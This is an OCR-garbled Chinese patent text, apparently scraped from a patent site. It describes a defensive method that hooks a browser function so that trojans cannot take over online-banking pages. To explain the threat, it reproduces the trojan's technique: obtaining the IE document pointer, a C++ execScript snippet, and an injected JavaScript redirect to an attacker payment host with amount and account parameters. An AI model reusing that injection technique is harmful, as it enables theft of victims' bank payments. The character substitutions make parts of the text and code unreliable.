本发明专利技术公开了一种对修改网页元素的恶意程序进行拦截的方法及装置,所述方法包括侦测到客户端浏览器启动后,在预设的浏览器模块中对预设函数的调用进行监控;然后侦测到客户端浏览器打开预设网站的网页时,根据预设策略,拒绝任何程序对所述被监控的预设函数的调用,直至该网页被关闭。应用本申请的实施例,可在源头上防止恶意程序获取操作网页元素的指针,避免木马对网页元素的篡改,为网民提供了安全的网购环境。
【技术实现步骤摘要】
本专利技术涉及计算机
,尤其涉及ー种对修改网页元素的恶意程序进行拦截的方法及装置。
技术介绍
随着电子商务的发展,网上购物也越来越普及,火热的网购促销活动吸引了大量消费者下单,但各种恶意程序,例如病毒木马却时刻威胁着网民的购物安全,例如,ー种名为“网银大盗”的网购木马及其变种,利用某知名播放器组件加载木马,由正常软件作为木马加载器和保护伞,从而导致绝大多数杀毒软件拦截失效。该木马运行后,会偷偷篡改网上支付金额和收款账户,把受害者的网银资金劫持到黑客账户中。 买家在促销活动中容易放松警惕,如果点击运行了“网银大盗”,购物支付页面就会被木马篡改。与早期的网购木马不同,“网银大盗”不仅劫持支付资金流向,还会数百倍放大支付金額,使网民蒙受更惨重的经济损失。由此可见,如何提供一种针对修改网页元素的木马进行拦截的机制,已经成为业界亟待解决的问题。
技术实现思路
本专利技术所要解决的技术问题在于提供ー种对修改网页元素的恶意程序进行拦截的方法及装置,已对各种新型的网购恶意程序进行拦截,保障网民的资金安全。为解决上述技术问题,本专利技术提供ー种对修改网页元素的恶意程序进行拦截的方法,包括如下步骤侦测到客户端浏览器启动后,在预设的浏览器模块中对预设函数的调用进行监控;侦测到客户端浏览器打开预设网站的网页时,根据预设策略,拒绝任何程序对所述被监控的预设函数的调用,直至该网页被关闭。本专利技术还ー种对修改网页元素的恶意程序进行拦截的装置,包括监控模块,用于在侦测到客户端浏览器启动后,在预设的浏览器模块中对预设函数的调用进行监控;拦截模块,用于在侦测到客户端浏览器打开预设网站的网页时,根据预设策略,拒绝任何程序对所述被监控的预设函数的调用,直至该网页被关闭。应用本申请的实施例,可在源头上防止恶意程序获取操作网页元素的指针,避免木马对网页元素的篡改,为网民提供了安全的网购环境。附图说明为了更清楚地说明本专利技术实施例的技术方案,下面将对实施例描述中所需要使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本专利技术的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。图I为根据本专利技术的实施例所示的对修改网页元素的木马进行拦截的方法流程示意图。图2为根据本专利技术的实施例所示的对修改网页元素的木马进行拦截的装置结构示意图。具体实施例方式下面将结合本专利技术实施例中的附图,对本专利技术实施例中的技术方案进行清楚、完整地描述,显然,所描述的实施例仅仅是本专利技术一部分实施例,而不是全部的实施例。基于本专利技术中的实施例,本领域普通技术人员在没有做出创造性劳动前提下所获得的所有其他实施例,都属于本专利技术保护的范围。为了便于理解本申请技术方案的拦截原理,本说明书以木马为例,先描述ー下此类网购恶意程序盗取财产的方式I、在启动后,会循环执行,FindWindow查找IE窗ロ,向其发送WM_HTML_GETOBJECT得到对应的CDOC指针;2、通过该指针在网页中嵌入自己定制的JS脚本,来获取网银页面内容,进行跳转篡改;例如,当用户访问“中国エ商银行”网页时,木马会动态获取此时的网页源码,查找其中的RMB (即充值金额)等信息,拼接出跳向自己充值账户网址的JS脚本" document, write、" <,script>window. location, href = ' http://abank.corsgate. com money = lOO&bank = ICBC&user = ' ;</script)A ノ 〃 通过以下代码执行JS:if (pDocument) { CComQIPtr <IHTMLWindow2> pHTMLWnd; pDocument-〉get_parentWindow( &pHTMLWnd ); if ( pHTMLWnd != NULL ) {CComBSTR bstrjs = strjs.AllocSysStringQ;CComBSTR bstrlan = SysAllocString(L "javascript");VARIANT varRet; pHTMLWnd-〉execScript(bstrjs, bstrlan, &varRet); } }3、执行完木马的JS后网页会发生跳转,经过3次如下跳转,速度很快http://abank. corsgate. com/ebanK3. asphttp://interface2.game2.cn/ view = pay formhttps://www. yeepay. com/app-merchant-proxy/createOrder. action在3次跳转过程中,木马会监控这3个网址,继续插入JS动态修改,导致最終又回到中国エ商银行的交易界面。此时充值帐号已经变为木马作者的帐号,充值金额也随机发生变化。但呈现给用户的界面是无法察觉到的。通过深入细致的研究,本申请的专利技术人发现所有的网购木马要想篡改IE内核浏览器的页面元素,必须首先通过ー个特定的函数来远程获取操作IE浏览器的指针,有了该指针,就像得到了一把万能钥匙,可随意操作网页的一切信息,从而更改支付账户、支付金额的手段变得多种多样,轻而易举。只要不让木马获得这把万能钥匙,就可以让这种木马失效。为此,本专利技术实施例首先提供ー种对修改网页元素的木马进行拦截的方法,如图I所示,首先,在侦测到客户端浏览器启动后,在预设的浏览器模块中对预设函数的调用进行监控(步骤101);然后,侦测到客户端浏览器打开预设网站的网页时,根据预设策略,拒绝任何程序对所述被监控的预设函数的调用,直至该网页被关闭(步骤102)。在检测到该网页被关闭后,即可认为用户退出了网购模式,这时,就可以恢复到正常的监控等级,只对特定函数的调用进行监控而不是拒绝。其中,所述预设的浏览器模块可以包括Safemon. dll。所述预设函数可以是包括进程间windows消息通信过程中转换消息对象的函数,例如 OLEACC ! LresultFromObject 函数。所述预设策略,可以包括对被监控的函数调用进行分析,当该函数的參数符合预设消息类型时,拒绝任何程序对所述被监控的预设函数的调用。所述预设消息类型,可以包括IID_IHTMLDocument2。该函数的參数ー标记着不同的消息类型,只有当其符合IID_IHTMLD0Cument2消息类型时,才进行拒绝,因为IID_IHTMLD0CUment2的消息类型表明其他进程(可能是网购木马)想通过给IE发送这个消息来获取操作IE网页元素的对象,几乎没有正常程序会去执行这样的操作。如此ー来,通过在IE内核浏览器的核心模块Safemon. dlI中拦截OLEACC !LresultFromObject函数(例如,通过对该函数进行Inline Hook操作实现拦截过滤),当用户进入网购模式时,可杜绝任何程序对该函数的调用,即从源头上防止了木马获取操作网页元素的指针。而且,根据本申请的实施例,在浏览器启动后即会对预设函数进行监控,但此时尚未进行拦截,而当浏览器进入网购模式(即打开了预设网站,也就是说输入的网络本文档来自技高网...
【技术保护点】
【技术特征摘要】
【专利技术属性】
技术研发人员:肖锐,肖鹏,向明,宁敢,
申请(专利权)人:奇智软件北京有限公司,
类型:发明
国别省市:
还没有人留言评论。发表了对其他浏览者有用的留言会获得科技券。